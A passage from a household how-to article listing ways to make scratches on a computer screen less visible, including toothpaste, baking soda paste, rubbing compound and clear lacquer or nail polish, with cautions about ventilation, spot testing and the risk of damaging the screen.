    • If the scratch is small, a bit of petroleum jelly is a safe option.
    • It won't repair the scratch, but it will make it look more discreet.

                                      **********************************
      4.Use a bit of toothpaste to buff out the scratch. Make sure it is not the gel-type, as this will not work.
    • Work the toothpaste over the scratch with a microfiber or other soft cloth.
    • Let it dry, then wipe off with a clean, barely damp cloth.

                                      **********************************

      5.Use baking soda to buff out the scratch. A paste of baking soda and water may also be used to remove small scratches.
    • Mix 2 parts baking soda with 1 part water. Add more baking soda if needed to make a thick paste.
    • Work the paste over the scratch with a microfiber or other soft cloth.
    • Let it dry, then wipe off with a clean, barely damp cloth.

                                      **********************************

      6.Try rubbing compound for severe scratches. Rubbing compound can be found online or at auto supply stores. 
    • Be very careful when using this. Limit it to the damaged area only, and consider doing a spot test on the corner of your screen.
    • Rub a very small amount on your screen with a q-tip, and work back and forth until the scratch is minimized.
    • Let it sit for a few minutes, then wipe off carefully.
    • Clean the screen very well afterwards with a clean cloth and screen cleaning fluid or dilute vinegar.

                                     ***********************************

      7.Use clear lacquer. Consider this option for very old monitors, or where the scratch might get bigger if not addressed. This will cause a bit of haziness on the screen where the lacquer was applied.
    • Cut a hole in a piece of paper. The hole should be slightly larger than the scratch. Use this to mask off the screen. and make sure everything is covered (keyboard, buttons, etc) except the scratch.
    • Spray a thin coat of lacquer onto the paper, over the hole, to “stencil” the lacquer onto the scratch. Remove the paper carefully afterwards, to avoid smearing.
    • Alternately, clear nail polish applied to the scratch may also prevent it from becoming larger. Use a small brush or toothpick to carefully apply the lacquer to the scratch.
    • Clear lacquer may be found in craft stores and places where spray paint is sold.
    • Make sure the lacquer is completely dry before you turn on your screen.
    • Always use lacquer in a well-ventilated area.
    • Make sure your screen is completely clean before applying lacquer.

                                    **************************************

      8.Know that these methods are to be used at your own risk, and may damage your screen.
    • For glare-reducing screens, this can create a “shiny spot” on the screen.
    • Consider the risk of these options as trade-offs, rather than having an annoying scratch.
    • Remember to use your best judgement and apply these methods conservatively.


      ******************************************************************


share